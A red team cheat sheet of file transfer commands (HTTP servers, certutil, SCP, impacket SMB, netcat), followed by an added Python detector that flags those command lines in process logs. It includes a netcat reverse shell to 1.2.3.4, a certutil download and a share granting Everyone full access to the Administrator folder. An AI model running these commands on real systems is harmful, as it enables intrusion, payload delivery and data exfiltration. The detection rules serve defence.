File transfer is a critical capability during red team operations, whether for payload delivery, data exfiltration, lateral movement, or post-exploitation tooling. However, moving files within a target environment is often constrained by network segmentation, egress filtering, endpoint protections, and logging mechanisms. Selecting the wrong transfer method can quickly expose an operation or trigger defensive controls.
This cheat sheet provides practical file transfer techniques tailored for red team engagements, covering common protocols, living-off-the-land binaries (LOLBins), covert channels, and environment-specific trade-offs.
HTTP
Upload Server
netsh advfirewall firewall add rule name="TMP: Allow Upload of file" dir=in action=allow protocol=TCP localport=<port>
python3 -m uploadserver <port>
sudo ufw allow <port>/tcp comment 'TMP: Allow Upload of file'
python3 -m uploadserver <port>
Download Server
python3 -m http.server 80
certutil.exe -urlcache -f <url> <filename>
wget <url>
SCP
scp file.txt <user>@<host>:/remote/directory
scp <user>@<host>:/remote/directory/file.txt ./
SMB
impacket-smbserver LUN . -smb2support
impacket-smbserver LUN . -user lun -password lun -smb2support &
net use L: \\<IP>\LUN /user:lun lun
cp ./file.txt L:\
sudo mount -t cifs //<IP>/LUN /tmp/share
sudo mount -t cifs -o 'username=lun,password=lun' //<IP>/LUN /tmp/share
net share LUN=C:\Users\Administrator /GRANT:Everyone,FULL
Netcat
Send:
nc -nv <IP> 4444 < file.exe
Receive:
nc -nlvp 4444 > file.exe
👺 Some OSs (OpenBSD) will use nc.traditional rather than nc, so watch out for that…
whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
/bin/nc.traditional -e /bin/bash 1.2.3.4 4444
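On the defensive side, each command on this page leaves a recognizable process command line. The following is an added example, not part of the original cheat sheet: it matches the certutil, uploadserver, http.server, impacket-smbserver, net share and nc invocations listed above against process-creation log lines. The rule names, the one-command-per-line log format and the sample lines are assumptions made for the example.

```python
import re

# Patterns derived from the command lines listed on this page.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*[-/]f\b", re.I)),
    ("python_upload_server",
     re.compile(r"\bpython[\d.]*(\.exe)?\s+-m\s+uploadserver\b", re.I)),
    ("python_http_server",
     re.compile(r"\bpython[\d.]*(\.exe)?\s+-m\s+http\.server\b", re.I)),
    ("impacket_smbserver", re.compile(r"\bimpacket-smbserver\b", re.I)),
    ("net_share_everyone_full",
     re.compile(r"\bnet1?(\.exe)?\s+share\s+\S+=.*/grant:everyone,full\b", re.I)),
    ("netcat_exec",
     re.compile(r"\bnc(\.traditional|\.exe)?\s+(.*\s)?-e\s+\S+", re.I)),
    ("netcat_listener",
     re.compile(r"\bnc(\.traditional|\.exe)?(\s+\S+)*?\s+-[a-z]*l[a-z]*(\s|$)", re.I)),
]

def classify(cmdline):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return (line number, command line, matched rules) for every line with a hit."""
    return [(i, l, classify(l)) for i, l in enumerate(lines, 1) if classify(l)]

# Constructed sample of process-creation command lines (not real telemetry).
SAMPLE = [
    "certutil.exe -urlcache -f http://198.51.100.7/tool.bin tool.bin",
    "certutil.exe -hashfile C:\\Temp\\tool.bin SHA256",
    "python3 -m uploadserver 8000",
    "python3 -m http.server 80",
    "impacket-smbserver LUN . -smb2support",
    "net share LUN=C:\\Users\\Administrator /GRANT:Everyone,FULL",
    "/bin/nc.traditional -e /bin/bash 1.2.3.4 4444",
    "nc -nlvp 4444",
    "rsync -e ssh ./docs backup:/srv/docs",
]

if __name__ == "__main__":
    for n, line, rules in scan(SAMPLE):
        print(n, rules, line)
```

Shell redirections such as `> file.exe` are handled by the parent shell and do not appear in the nc process arguments, so the listener rule keys on the `-l` flag alone.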
